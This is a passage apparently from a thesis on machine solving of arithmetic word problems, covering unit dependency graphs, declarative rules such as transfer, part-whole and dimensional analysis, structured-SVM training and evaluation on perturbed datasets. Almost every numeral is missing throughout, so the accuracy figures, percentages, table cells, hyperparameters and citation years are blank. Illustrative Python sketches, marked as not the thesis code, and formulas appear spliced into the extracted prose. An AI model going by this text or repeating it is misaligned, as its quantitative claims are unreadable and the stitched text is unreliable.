random -fold cross validation results on all these datasets. for each fold, we choose % of the training data as development set, and tune the scaling parameters on this set. once the parameters are set, we retrain all the models on the entire training data. we use a beam size of in all our experiments. . . data acquisition in order to learn the classifiers for predicting vertex and edge labels for udgs, we need annotated data. however, gathering vertex and edge labels for udgs of problems, can be expensive. in this section, we show that vertex labels for a subset of problems, along with annotations for solution expressions, can be sufficient to gather high quality annotations for vertex and edge labels of udgs. given an arithmetic word problem p , annotated with the monotonic expression tree t of the solution expression, we try to acquire annotations for the udg of p . first, we try to determine the labels for the vertices, and next the edges of the graph. we check if t has any multiplication or division node. 
if no such node is present, we know that all the numbers in the leaves of t have been combined via addition or subtraction, and hence, none of them describes a rate in terms of the units of other numbers. this determines that none of t ’s leaves is a rate, and also, the question does not ask for a rate. if a multiplication or division node is present in t, we gather annotations for the numbers in the leaves of t as well as the question of p . annotators were asked to mark whether each number represents a rate relationship, and whether the question in p asks for a rate. this process determines the labels for the vertices of the udg. two annotators performed these annotations, with an agreement of . (kappa). once we have the labels for the vertices of the udg, we try to infer the labels for the edges using algorithm . when the algorithm is unable to infer the label for a particular edge, we heuristically label that edge to be no relation. the above process allowed us to extract high quality annotations for udgs with minimal manual anno- tations. in particular, we only had to annotate vertex labels for problems, out of the problems in allarith. obviously some of the extracted no relation edge labels are noisy; this can be remedied by collecting annotations for these cases. however, in this work, we did not use any manual annotations for edge labels. features vertex classifier edge classifier allarith allarithlex allarithtmpl allarith allarithlex allarithtmpl all features . . . . . . no rule based features . . . . . . no context fea- tures . . . . . . table . : performance of system components for predicting vertex and edge labels for unit dependency graphs . . udg prediction table . shows the performance of the classifiers and the contribution of each feature type. the results indicate that rule-based techniques are not sufficient for robust extraction, there is a need to take context into account. table . shows the performance of our decomposed model (decompose) in correctly predicting udgs, as well as the contribution of constraints in the inference procedure. having explicit constraints for the graph structure provides - % improvement in correct udg prediction. we also compare against a jointly trained model (joint), which learns to predict all vertex and edge labels together. note that joint also uses the same set of constraints as decompose in the inference procedure, to ensure it only predicts valid unit dependency graphs. we found that joint does not outperform decompose, while taking significantly more time to train. the worse performance of joint learning is due to: ( ) search space being too large for the joint model to do well given our relatively small dataset size, and ( ) our independent classifiers being good enough, thus supporting better joint inference. this tradeoff is strongly supported in the literature [punyakanok et al., b, sutton and mccallum, ]. note, that all these evaluations are based on noisy edges annotations. this was done to reduce further annotation effort. also, less than % of labels were noisy (indicated by fraction of no relation labels), which makes this evaluation reasonable. allarith allarithlex allarithtmpl decompose . . . - constraints . . . joint . . . table . : performance in predicting udgs . . solving arithmetic word problems here we evaluate the accuracy of our system in correctly solving arithmetic word problems. we refer to our system as unitdep. we compare against the following systems: . 
lca++ : system of [roy and roth, ] with feature set augmented by neighborhood features, and with only positive answer constraint. we found that augmenting the released feature set with context features, and removing the integral answer constraint, were helpful. our system unitdep also uses the augmented feature set for relevance and lca operation classifiers, and only positive constraint for final solution value. . template : template based algebra word problem solver of [kushman et al., ]. . singleeq : single equation word problem solver of [koncel-kedziorski et al., ]. in order to quantify the gains due to vertex and edge information of udgs, we also run two variants of unitdep - one with λvertex = , and one with λedge = . table . shows the performance of these systems on allarith, allarithlex and allarithtmpl. system allarith allarithlex allarithtmpl template . . . singleeq . . . lca++ . . . unitdep . . . λvertex = . . . λedge = . . . table . : performance in solving arithmetic word problems unitdep outperforms all other systems across all datasets. setting either λvertex = or λedge = leads to a drop in performance, indicating that both vertex and edge information of udgs assist in math problem solving. note that setting both λvertex and λedge to , is equivalent to lca++. singleeq performs worse than other systems, since it does not handle irrelevant quantities in a problem. in general, reduction of lexical overlap adversely affects the performance of most systems. the reduction of template overlap does not affect performance as much. this is due to the limited number of equation templates found in arithmetic problems. introduction of udgs make the system more robust to reduction of both lexical and template overlap. in particular, they provide an absolute improvement of % in both allarithlex and allarithtmpl datasets (indicated by difference of lca++ and unitdep results). for the sake of completeness, we also ran our system on the previously used datasets, achieving % and % absolute improvements over lca++, in the illinois dataset [roy et al., ] and the commoncore dataset [roy and roth, ] respectively. . . discussion most of gains of unitdep over lca++ came from problems where lca++ was predicting an operation or an expression that was inconsistent with the units. a small gain ( %) also comes from problems where udgs help detect certain irrelevant quantities, which lca++ cannot recognize. table . lists some of the examples which unitdep gets correct but lca++ does not. most of the mistakes of unitdep were due to extraneous quantity detection (around %). this was followed by errors due to the lack of math understanding (around %). this includes comparison questions like “how many more pennies does john have?”. problem lca++ unitdep at lunch a waiter had customers and of them didn’t leave a tip. if he got $ . each from the ones who did tip, how much money did he earn? . -( . / . ) . *( . - . ) the schools debate team had boys and girls on it. if they were split into groups of , how many groups could they make? *( + ) ( + )/ melanie picked plums and oranges from the orchard . she gave plums to sam . how many plums does she have now ? ( + )- ( - ) isabellas hair is . inches long. by the end of the year her hair is . inches long. how much hair did she grow? ( . * . ) ( . - . ) table . : examples of problems which unitdep gets correct, but lca++ does not. . 
conclusion in this chapter, we introduce the concept of unit dependency graphs, to model the dependencies among units of numbers mentioned in a math word problem, and the question asked. the dependencies of udgs help improve performance of an existing arithmetic word problem solver, while also making it more robust to low lexical and template overlap of the dataset. code and dataset are available at http://cogcomp.cs.illinois.edu/page/publication view/ . chapter mapping to declarative knowledge . introduction understanding and solving math word problems involves understanding several mathematical concepts, as well as their interaction with the physical world. consider the arithmetic word problem shown in fig . , targeted towards elementary school students. to solve the problem, one needs to understand that “apple pies” and “pecan pies” are parts of “pies”, and hence, the number of apple pies and pecan pies needs to be added to get the total number of pies. similarly, detecting that “ ” represents “the number of pies per row” and applying dimensional analysis or unit compatibility knowledge, helps us infer that the total number of pies needs to be divided by to get the answer. besides part-whole relationship and dimensional analysis, there are several other concepts needed to support the reasoning in word problems. some of them involve understanding comparisons, transactions, as well as application of math or physics formulas. we refer to any such formulas or concepts as “math domain knowledge”. in the last chapter, we show how dimensional analysis knowledge can be integrated into math problem solving. in this chapter, we introduce a more general framework to incorporate any “math domain knowledge” into word problem solving. for combining a pair of numbers or math sub-expressions, our method first predicts the type of knowledge that is needed for it (like subset relationship, dimensional analysis, etc), and then predicts a declarative rule under that knowledge type to infer the mathematical operation. we model the selection of declarative rules as a latent variable, which removes the need for expensive annotations for the intermediate steps of our method. the proposed approach has some clear advantages compared to existing work on word problem solving. first, it provides a way to relax the tight coupling between the “language understanding” component and the “math knowledge” component. this relaxation facilitates better generalization, as we show, and, opens the ways to incorporate additional, more sophisticated math knowledge from different domains. second, it provides interpretability of the solution, without expensive annotations. our method predicts a declarative arithmetic word problem mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? solution ( + )/ = type of knowledge needed for each operation figure . : an example arithmetic word problem and its solution, along with the type of domain knowledge required to generate each operation of the solution knowledge based inference rule for each operation needed in the solution. these rules provide an explanation for the operations performed. in particular, it learns to predict these rules without explicit annotations for them. third, each individual operation in the solution expression can be generated independently by a separate knowledge type. 
this allows our method to use multiple knowledge types in the same problem. we show that existing datasets of arithmetic word problems suffer from significant vocabulary biases and, consequently, existing solvers do not do well on conceptually similar problems that are not biased in the same way. our method, on the other hand, learns the right abstractions even in the presence of biases in the data. we also introduce a novel approach to gather word problems without these biases, creating a new dataset of problems.
the next section introduces our representation of domain knowledge as well as the specific types of knowledge we use for arithmetic word problems. section . describes our model to predict answers using domain knowledge, and provides details of our training paradigm. finally, we provide an experimental evaluation of our proposed method in section . , and then conclude with a discussion of related work.

. knowledge representation
we introduce our representation of domain knowledge in this section. we organize any knowledge hierarchically in two levels - knowledge types and declarative rules. a knowledge type is a concept or phenomenon which needs to be understood to apply reasoning over numbers. examples of knowledge types include part-whole relations, dimensional analysis, etc. under each knowledge type, there are a few declarative rules, which dictate which operation is needed in a particular context. an example of a declarative rule under the part-whole knowledge type can be that if two numbers quantify "parts" of a larger quantity, the operation between them must be addition. these rules often use knowledge type specific predicates, which we exemplify in the following subsections. since this work focuses on arithmetic word problems, we consider the knowledge types which are most common in these problems, as follows:
. transfer: this involves understanding the transfer of objects from one person to another. for example, the action described by the sentence "tim gave apples to jim" results in tim losing " apples" and jim gaining " apples".
. dimensional analysis: this involves understanding compatibility of units or dimensions of numbers. for example, " pies" can be divided by " pies per row" to get the number of rows.
. part-whole relation: this includes asserting that if two numbers quantify parts of a larger quantity, they are to be added. for example, the problem in section ?? involves understanding that "pecan pies" and "apple pies" are parts of "pies", and hence must be added.
. explicit math: often word problems mention explicit math relationships among the quantities or entities in the problem. for example, "jim is inches taller than tim". this knowledge type captures the reasoning needed for such explicit math relationships.
each of these knowledge types comprises a small number of declarative rules which determine the math operations; we describe them below.

. . transfer
consider the following excerpt of a word problem exhibiting a transfer phenomenon: "stephen owns books. daniel gave him books." the goal of the declarative rules is to determine which operation is required between and , given that we know that a transfer is taking place. we note that a transfer usually involves two entities, which occur as subject and indirect object in a sentence. also, the direction of transfer is determined by the verbs associated with the entities.
we define a set of variables to denote these properties; we define as subj , verb , iobj the subject, verb and indirect object associated with the first number, and as subj , verb , iobj the subject, verb and indirect object related to the second number. for the above example, the assignment of the variables are shown below: [stephen]subj [owns]v erb books. [daniel]subj [gave]v erb [him]iobj books. in order to determine the direction of transfer, we require some classification of verbs. in particular, we classify each verb into one of five classes, namely have, get, give, construct and destroy. the have class constitutes all verbs which signify the state of an entity, such as “have”, “own”, etc. the get class contains verbs which indicate the gaining of things for the subject. examples of such verbs are “acquire”, “borrow”, etc. the give class contains verbs which indicate the loss of things for the subject. verbs like “lend”, “give” belong to this class. finally construct class constitutes verbs indicating construction or creation, like “build”, “fill”, etc., while destroy indicates destruction related verbs like “destroy”, “eat”, “use”, etc. this verb classification is largely based on the work of [hosseini et al., ]. finally, the declarative rule applicable for our example has the following form: [verb ∈ have] ∧ [verb ∈ give] ∧ [coref(subj , iobj )] ⇒ addition where coref(a,b) is true when a and b represent the same entity or are coreferent, and is false otherwise. verb is “own” and hence [verb ∈ have] is true. verb is “give” and hence [verb ∈ give] is true. finally, subj and iobj both refer to stephen, so [coref(subj , iobj )] returns true. as a result, the above declarative rule dictates that addition should be performed between and . we have such inference rules for transfer, covering all combinations of verb classes and coref() values. all these rules generate addition or subtraction operations. . . dimensional analysis we now look at the use of dimensional analysis knowledge in word problem solving. to use dimensional analysis, one needs to extract the units of numbers as well as the relations between the units of numbers. consider the following excerpt of a word problem: “stephen has bags. each bag has apples. knowing that the unit of is “bag” and the effective unit of is “apples per bag”, allows us to infer that the numbers can be multiplied to obtain the total number of apples. to capture these dependencies, we first introduce a few terms. whenever a number has a unit of the form “a per b”, we refer to “a” as the unit of the number, and refer to “b” as the rate component of the number. in our example, the unit of is “apple”, and the rate component of is “bag”. we define variables unit and rate to denote the unit and the rate component of the first number respectively. we similarly define unit and rate . for the above example, the assignment of variables are shown below: stephen has [bags]unit . each [bag]rate has [apples]unit . finally, the declarative rule applicable for our example has the following form: [coref(unit , rate )] ⇒ multiplication we have only rules for dimensional analysis knowledge type. they generate multiplication or division operations. . . explicit math in this subsection, we want to capture the reasoning behind explicit math relationships expressed in word problems such as the one described in “stephen has apples. daniel has more apples than stephen”. 
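before the discussion of explicit math patterns continues, the following minimal python sketch (not the thesis code) illustrates one way the transfer and dimensional-analysis rules above could be encoded as data and applied; the verb seed sets, the coref predicate, and the extracted-variable dictionary are simplifying assumptions made only for this illustration.

HAVE = {"have", "own", "hold"}
GET = {"get", "acquire", "borrow", "receive"}
GIVE = {"give", "lend", "donate"}
CONSTRUCT = {"build", "make", "fill"}   # listed for completeness; unused below
DESTROY = {"destroy", "eat", "use"}

def coref(a, b):
    # placeholder coreference check; the thesis learns this function instead
    return a is not None and b is not None and a.lower() == b.lower()

# each rule: (condition over the extracted variables, operation it implies)
TRANSFER_RULES = [
    (lambda v: v["verb1"] in HAVE and v["verb2"] in GIVE
               and coref(v["subj1"], v["iobj2"]), "+"),
    (lambda v: v["verb1"] in HAVE and v["verb2"] in GET
               and coref(v["subj1"], v["subj2"]), "+"),
    # ... remaining verb-class / coreference combinations go here
]

DIMENSIONAL_RULES = [
    # [coref(unit1, rate2)] => multiplication
    (lambda v: coref(v["unit1"], v["rate2"]), "*"),
]

def apply_rules(rules, variables):
    # return the operation implied by the first rule whose condition holds
    for condition, operation in rules:
        if condition(variables):
            return operation
    return None

# "stephen owns _ books. daniel gave him _ books."
example = {"subj1": "stephen", "verb1": "own", "iobj1": None,
           "subj2": "daniel", "verb2": "give", "iobj2": "stephen"}
print(apply_rules(TRANSFER_RULES, example))  # -> "+"

in this sketch a rule fires deterministically; in the actual system the rule choice is scored by a learned model, as described in the following sections.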
to detect such math relationships, we create a small list of patterns which indicate explicit math relationships, as well as, categorize these patterns based on the operation they imply. for example, the list for addition (add) has the patterns “more than”, “taller than”, “heavier than”, etc, and the list for subtraction (sub) has patterns like “less than”, “shorter than”, etc. we define by math and math any explicit math term associated with the first and second numbers respectively. as was the case for transfers, we also define subj , iobj , subj , and iobj to denote the entities participating in the math relationship. the assignment of these variables in our example is shown below. [stephen]subj has apples. [daniel]subj has [more apples than]math [stephen]iobj . finally the declarative rule that applies is: [coref(subj , iobj )] ∧ [math ∈ add] ⇒ addition we have only rules for the explicit math knowledge type. . . part-whole relation understanding part-whole relationship entails understanding whether two quantities are hyponym, hypernym or siblings (that is, co-hyponym, or parts of the same quantity). for example, in the excerpt “mrs. hilt has pecan pies and apple pies”, determining that pecan pies and apple pies are parts of all pies, helps inferring that addition is needed. we have simple rules which directly map from hyponym, hypernym or sibling detection to the corresponding math operation. for the above example, the applicable declarative rule is: [sibling(number , number )] ⇒ addition the rules for part-whole knowledge type can generate addition and subtraction operations. note that all the declarative rules are designed to determine an operation between two numbers only. we introduce a strategy in section . , which facilitates combining sub-expressions with these declarative rules. a complete list of declarative rules is added to the appendix. . mapping of word problems to declarative knowledge word problem tim ’s cat had kittens . he gave to jessica. then sara gave him kittens . how many kittens does he now have ? knowledge based answer derivation word problem mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? knowledge based answer derivation table . : two examples of arithmetic word problems, and derivation of the answer. for each combination, first a knowledge type is chosen, and then a declarative rule from that knowledge type is chosen to infer the operation. given an input arithmetic word problem x, the goal is to predict the math expression y, which generates the correct answer. in order to derive the expression y from the word problem x, we leverage declarative knowledge types and declarative rules that we introduced in section . . in order to combine two numbers mentioned in x, we first predict a domain knowledge type k, and then we choose a declarative knowledge rule r from k. the rule r generates the math operation needed to combine the two numbers. consider the first example in table . . to combine and , we first decide on the transfer knowledge type, and then choose an appropriate rule under transfer to generate the operation. next we need to combine the sub-expression ( + ) with the number . however, our inference rules were designed for the combination of two numbers only. in order to combine a sub-expression, we choose a representative number from the sub-expression, and use that number to determine the operation. 
in our example, we choose the number as the representative number for ( + ), and decide the operation between and , following a similar procedure as before. this operation is now used to combine ( + ) and . the representative number for a sub-expression is chosen such that it preserves the reasoning needed for the combination of this sub-expression with other numbers. we follow a simple heuristic to choose a representative number from a sub-expression:
. for transfers and part-whole relationships, we choose the representative number of the left subtree.
. in case of a rate relationship, we choose the number which does not have a rate component.
. in case of explicit math, we choose the number which is not directly associated with the explicit math expression.

. . scoring answer derivations
given the input word problem x, the solution math expression y is constructed by combining numbers in x with operations. we refer to the set of operations used in an expression y as O(y). each operation o in O(y) is generated by first choosing a knowledge type ko, and then selecting a declarative rule ro from that knowledge type. in order to discriminate between multiple candidate solution expressions of a word problem x, we score them using a linear model over features extracted from the derivation of the solution. our scoring function has the following form:

score(x, y) = \sum_{o \in O(y)} w_k \cdot \phi_k(x, k_o) + w_r \cdot \phi_r(x, r_o)

where \phi_k(x, k_o) and \phi_r(x, r_o) are feature vectors related to the knowledge type ko and the declarative rule ro, respectively, and w_k and w_r are the corresponding weight vectors. the term w_k \cdot \phi_k(x, k_o) is the score for the selection of ko, and the term w_r \cdot \phi_r(x, r_o) is the score for the selection of ro. finally, the total score is the sum of the scores of all knowledge type and rule choices, over all operations of y.

. . learning
we wish to estimate the parameters of the weight vectors w_k and w_r, such that our scoring function assigns a higher score to the correct math expression, and a lower score to other competing math expressions. for learning the parameters, we assume access to word problems paired with the correct math expression. we show in section . that certain simple heuristics and rate component annotations can be used to create somewhat noisy annotations of knowledge types for operations. hence, we will assume for our formulation access to knowledge type supervision as well. we thus assume access to m examples of the following form:

\{(x_1, y_1, \{k_o\}_{o \in O(y_1)}), (x_2, y_2, \{k_o\}_{o \in O(y_2)}), \ldots, (x_m, y_m, \{k_o\}_{o \in O(y_m)})\}

we do not have any supervision for declarative rule selection, which we model as a latent variable.
two stage learning: a straightforward solution for our learning problem could be to jointly learn w_k and w_r using a latent structured svm. however, we found that this model does not perform well. instead, we chose a two stage learning protocol. at the first stage, we only learn w_r, the weight vector for scoring the declarative rule choice. once learned, we fix the parameters for w_r, and then learn the parameters for w_k. in order to learn the parameters for w_r, we solve the following optimization problem:

\min_{w_r} \|w_r\|^2 + C \sum_{i=1}^{m} \sum_{o \in O(y_i)} \Big[ \max_{\hat{r} \in k_o} w_r \cdot \phi_r(x_i, \hat{r}) \; - \max_{\hat{r} \in k_o, \hat{r} \Rightarrow o} w_r \cdot \phi_r(x_i, \hat{r}) \Big]

where \hat{r} \in k_o implies that \hat{r} is a declarative rule of the knowledge type ko, and \hat{r} \Rightarrow o signifies that the declarative rule \hat{r} generates the operation o. the above objective is similar to that of a latent structured svm.
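before continuing with the learning objective, a minimal python sketch of the scoring function defined above may help; the derivation representation, feature functions, and dictionary-based sparse vectors are placeholders introduced only for illustration, not the thesis implementation.

def dot(w, phi):
    # sparse dot product between a weight vector and a feature vector,
    # both represented as {feature_name: value} dictionaries
    return sum(w.get(f, 0.0) * v for f, v in phi.items())

def phi_knowledge(problem, knowledge_type):
    # placeholder: features for the knowledge-type choice (e.g. rate detected?)
    return {"ktype=" + knowledge_type: 1.0}

def phi_rule(problem, rule):
    # placeholder: features for the declarative-rule choice (e.g. coref features)
    return {"rule=" + rule: 1.0}

def score(problem, derivation, w_k, w_r):
    # sum, over every operation in the candidate expression, the score of its
    # knowledge-type choice plus the score of its declarative-rule choice
    total = 0.0
    for op in derivation:  # each op records the chosen knowledge type and rule
        total += dot(w_k, phi_knowledge(problem, op["ktype"]))
        total += dot(w_r, phi_rule(problem, op["rule"]))
    return total

the two-stage estimation of w_r and w_k is described next.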
for each operation o in the solution expression y_i, the objective tries to minimize the difference between the highest scoring rule from its knowledge type ko, and the highest scoring rule from ko which explains or generates the operation o. next we fix the parameters of w_r, and solve the following optimization:

\min_{w_k} \|w_k\|^2 + C \sum_{i=1}^{m} \Big[ \max_{y \in Y} score(x_i, y) - score(x_i, y_i) \Big]

this is equivalent to a standard structured svm objective. note that fixing the parameters of w_r determines the scores for rule selection, removing the need for any latent variables at this stage.

. . inference
given an input word problem x, inferring the best math expression involves computing the following:

\arg\max_{y \in Y} score(x, y)

where Y is the set of all math expressions that can be created by combining the numbers in x with basic math operations. the size of Y is exponential in the number of quantities mentioned in x. as a result, it becomes computationally intractable to score each element of Y and pick the highest scoring expression. we instead perform approximate inference using beam search. we initialize the beam with the set E of all numbers mentioned in the problem x. at each step of the beam search, we choose two numbers (or sub-expressions) e1 and e2 from E, and then select a knowledge type and a declarative rule to infer an operation o. we create a new sub-expression e′ by combining the sub-expressions e1 and e2 with the operation o. we finally create a new set E′ from E, by removing e1 and e2 from it, and adding e′ to it. we remove E from the beam, and add all such modified sets E′ to the beam. we continue this process till all sets in the beam have only one element in them. we choose the highest scoring expression among these elements as the solution expression.

. model and implementation details
we describe in this section several details of our model related to the supervision and features we use for training.

. . supervision
each word problem in our dataset is annotated with the solution math expression, along with the alignment of numbers from the problem to the solution expression. in addition, we also have annotations for the numbers which possess a rate component. an example is shown in fig . .

problem: mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have?
number list: , ,
solution: ( [ ] + [ ])/ [ ] =
rates:
figure . : annotations in our dataset. number list refers to the numbers detected in the problem. the subscripts in the solution indicate the position of the numbers in the number list.

this is the same level of supervision used in [roy and roth, ]. many of the annotations can be extracted semi-automatically. the number list is extracted automatically by a number detector; the alignments require human supervision only when the same numeric value is mentioned multiple times in the problem. most of the rate component annotations can also be extracted automatically, see [roy and roth, ] for details. we apply a few heuristics to obtain noisy annotations for the knowledge types of operations. consider the case of combining two numbers num and num by an operation o. we apply the following rules:
. if we detect an explicit math pattern in the neighborhood of num or num , we assign the knowledge type ko to be explicit math.
. if o is multiplication or division, and one of num or num has a rate component, we assign ko to be dimensional analysis.
.
if o is addition or subtraction, we check if the dependent verb of both numbers are identical. if they are, we assign ko to be part-whole relationship, otherwise, we assign it to be transfer. the annotations obtained via these rules are of course not perfect. however, we tested a small sample of these annotations, and found only around % of them to be wrong. as a result, we assume these annotations to be correct, and formulate our learning problem accordingly. . . features we use two feature functions φk(x,k o) and φr(x,r o), where x is the input word problem, and ko and ro are the knowledge type and the declarative rule for operation o respectively. φr(x,r o) constitutes the following features: . if ro contains coref(·) function, we add features related to similarity of the arguments of coref(·), for example, word overlap, whether they constitute a pronoun, etc. . for part-whole relationships, we add indicators for a list of words like “remaining”, “rest”, “either”, “overall”, “total”, conjoined with the part-whole function in ro (hyponymy, hypernymy, sibling). . unigrams from the neighborhood of numbers being combined. finally, φk(x,k o) generates the following features: . if ko is related to dimensional analysis, we add features indicating whether a rule based system detected a rate component in the combining numbers. . if ko is part-whole, we add features indicating whether the verbs of combining numbers are identical. note that these features capture several interpretable functions like coreference, hyponymy, etc. we do not learn three components of our system – verb classification for transfer knowledge, categorization of explicit math terms, and irrelevant number detection. for verb classification, we use a seed list of around verbs for each category. given a new verb v, we choose the most similar verb v′ from the seed lists according to glove vector [pennington et al., ] based similarity . we assign v the category of v′. note that this can be replaced by a learned component (as in [hosseini et al., ]). however we found seed list based categorization to work well in most cases. for explicit math, we check for a small list of patterns to detect and categorize math terms. note that for both the cases above, we still have to learn coref(·) function to determine the final operation. finally, to detect irrelevant numbers (numbers which are not used in the solution), we use a set of rules based on the units of numbers. again, this can be replaced by a learned model (as in [roy and roth, ]). . experiments in this section, we experimentally evaluate our proposed approach, and perform a detailed analysis of the results. . . results on existing dataset we first evaluate our approach on the existing datasets of allarith, allarithlex, and allarithtmpl [roy and roth, ]. allarithlex and allarithtmpl are subsets of the allarith dataset, created to test the robustness to new vocabulary, and new equation forms respectively. we compare to the top word problem solvers which can handle arithmetic word problems. they are as follows: . template : template based algebra word problem solver of [kushman et al., ]. . lca++ : system of [roy and roth, ] based on lowest common ancestors of math expression trees. . unitdep: unit dependency graph based solver of [roy and roth, ]. we refer to our approach as knowledge. the first few columns of table . shows the performance of the systems on the aforementioned datasets. the performance of knowledge is on par or lower than some of the existing systems. 
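returning to the verb categorization described earlier in this section, the following python sketch shows nearest-seed-verb classification with pre-trained glove vectors. the embedding file path, the seed lists, and the fallback choice for out-of-vocabulary verbs are illustrative assumptions, not the system's actual configuration.

import numpy as np

def load_glove(path):
    # read a glove text file of the form "word v1 v2 ... vd" per line
    vectors = {}
    with open(path, encoding="utf-8") as f:
        for line in f:
            parts = line.rstrip().split(" ")
            vectors[parts[0]] = np.array(parts[1:], dtype=float)
    return vectors

SEEDS = {
    "HAVE": ["have", "own", "possess"],
    "GET": ["get", "acquire", "borrow"],
    "GIVE": ["give", "lend", "donate"],
    "CONSTRUCT": ["build", "make", "bake"],
    "DESTROY": ["destroy", "eat", "use"],
}

def cosine(u, v):
    return float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v) + 1e-12))

def classify_verb(verb, vectors):
    # assign the category of the most similar seed verb under glove similarity
    if verb not in vectors:
        return "HAVE"  # arbitrary fallback for out-of-vocabulary verbs
    best_class, best_sim = None, float("-inf")
    for category, seed_verbs in SEEDS.items():
        for seed in seed_verbs:
            if seed in vectors:
                sim = cosine(vectors[verb], vectors[seed])
                if sim > best_sim:
                    best_class, best_sim = category, sim
    return best_class

# vectors = load_glove("glove.6B.100d.txt")   # hypothetical local file
# print(classify_verb("purchase", vectors))   # expected to fall in a GET-like class

a learned classifier could replace this nearest-seed heuristic, as noted above; the sketch only makes the intended behavior concrete.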
we analyzed the performance of the systems, and found that most of them are not robust to perturbations of the problem text; table . shows a few examples. we further analyzed the datasets, and identified several biases in the problems (in both train and test). systems which remember these biases get an undue advantage in evaluation. for example, the verb "give" only appears with subtraction, and hence the models learn an erroneous correlation of "give" with subtraction. since the test set also exhibits the same bias, these systems get all the "give"-related questions correct. however, they fail to solve the problem in table . , where "give" results in addition.

system | allarith | allarith lex | allarith tmpl | aggregate | aggregate lex | aggregate tmpl | train on allarith, test on perturb
template | . ± . | . ± . | . ± . | . ± . | . ± . | . ± . | .
lca++ | . ± . | . ± . | . ± . | . ± . | . ± . | . ± . | .
unitdep | . ± . | . ± . | . ± . | . ± . | . ± . | . ± . | .
knowledge | . ± . | . ± . | . ± . | . ∗ ± . | . ∗ ± . | . ± . | . ∗
table . : accuracy in solving arithmetic word problems. all columns except the last report -fold cross validation results. ∗ indicates statistically significant improvement (p = . ) over the second highest score in the column.

problem | systems which solved correctly (trained on allarith) | systems which solved correctly (trained on aggregate)
adam has marbles. adam gave marbles to sam. how many marbles does adam have now? | template, unitdep, lca, knowledge | lca, unitdep, knowledge
adam has marbles. sam gave marbles to adam. how many marbles does adam have now? | knowledge | template, knowledge
adam has marbles. sam has more marbles than adam. how many marbles does sam have? | lca, unitdep, knowledge | lca, unitdep, knowledge
adam has marbles. adam has more marbles than sam. how many marbles does sam have? | template, knowledge | template, knowledge
table . : pairs of perturbed problems, along with the systems which get them correct

. . new dataset creation
in order to remove the aforementioned biases from the dataset, we augment it with new word problems collected via a crowdsourcing platform. these new word problems are created by perturbing the original problems minimally, such that the answer is different from the original problem. for each word problem p with an answer expression a in our original dataset allarith, we replace one operation in a to create a new math expression a′. we ask annotators to modify the problem p minimally, such that a′ is now the solution to the modified word problem. we create a′ from a either by replacing an addition with subtraction or vice versa, or by replacing multiplication with division or vice versa. we do not replace addition and subtraction with multiplication or division, since there might not be an easy perturbation that supports this conversion. we manually pruned problems which did not yield the desired solution a′, or were too different from the input problem p. this procedure gave us a set of new word problems, which we refer to as perturb. finally we augment allarith with the problems of perturb, and call this new dataset aggregate. aggregate has a total of problems. the addition of perturb problems ensures that the dataset now has problems with similar lexical items generating different answers. this minimizes the bias that we discussed in subsection . . . to quantify this, consider the probability distribution over operations for a quantity q, given that word w is present in the neighborhood of the number q.
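the next paragraph uses the entropy of this conditional distribution as a bias measure; the following python sketch (illustrative counts only, and averaging over neighborhood words rather than over all number-word pairs as in the thesis) shows one way such a value could be computed.

import math
from collections import defaultdict

def average_conditional_entropy(observations):
    # observations: iterable of (neighborhood_word, operation) pairs,
    # one per quantity occurrence in the dataset
    counts = defaultdict(lambda: defaultdict(int))
    for word, op in observations:
        counts[word][op] += 1

    entropies = []
    for word, op_counts in counts.items():
        total = sum(op_counts.values())
        h = -sum((c / total) * math.log2(c / total) for c in op_counts.values())
        entropies.append(h)
    return sum(entropies) / len(entropies) if entropies else 0.0

# e.g. if "gave" always co-occurs with subtraction, its entropy term is 0,
# pulling the average down and signalling a biased dataset
print(average_conditional_entropy([("gave", "-"), ("gave", "-"), ("each", "/"), ("each", "*")]))  # 0.5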
for an unbiased dataset, you will expect the entropy of this distribution to be high, since the presence of a single word in a number neighborhood will seldom be completely informative for the operation. we compute the average of this entropy value over all numbers and neighborhood words in our dataset. allarith and perturb have an average entropy of . and . respectively, whereas aggregate’s average entropy is . , indicating that, indeed, the complete data set is significantly less biased. . . generalization from biased dataset first, we evaluate the ability of systems to generalize from biased datasets. we train all systems on allarith, and test them on perturb (which was created by perturbing allarith problems). the last column of table . shows the performance of systems in this setting. knowledge outperforms all other systems in this setting with around % absolute improvement over unitdep. this shows that declarative knowledge allows the system to learn the correct abstractions, even from biased datasets. . . results on the new dataset finally, we evaluate the systems on the aggregate dataset. following previous work [roy and roth, ], we compute two subsets of aggregate comprising problems each, using the mawps [koncel-kedziorski et al., ] system. the first, called aggregatelex, is one with low lexical repititions, and the second called aggregatetmpl is one with low repititions of equation forms. we also evaluate on these two subsets on a -fold cross-valiation. columns - of table . show the performance of systems on this setting. knowledge significantly outperforms other systems on aggregate and aggregatelex, and is similar to unitdep on aggregatetmpl. there is a % absolute improvement on aggregatelex, showing that knowledge is significantly more robust to low lexical overlap between train and test. the last column of table . also shows that the other systems do not learn the right abstraction, even when trained on aggregate. . . analysis table . shows examples of problems which knowledge gets right, but unitdep does not. the gains can be attributed to the injection of declarative knowledge in our system. earlier systems like unitdep try to learn the reasoning required for these problems from the data alone. this is often difficult in the presence of limited data, and noisy output from nlp tools. in contrast, we learn probabilistic models for interpretable functions like coreference, hyponymy, etc., and then use declarative knowledge involving these functions to perform reasoning. this considerably reduces the complexity of the target function to be learnt, and hence we end up with a more robust model. a weakness of our method is the requirement to have all the relevant declarative knowledge during training. many of the component functions (like coreference) are learnt through latent alignments with no explicit annotations. if too many problems are not explained by the declarative knowledge, the model will learn noisy alignments for the component functions. rachel was organizing her book case making sure each of the shelves had exactly books on it. if she had shelves of mystery books and shelves of picture books, how many books did she have total? tim’s cat had kittens. he gave to jessica and to sara . he now has kittens . how many kittens did he have to start with ? mrs. snyder made heart cookies. she made red cookies, and the rest are pink. how many pink cookies did she make? table . : examples which knowledge gets correct, but unitdep does not. table . 
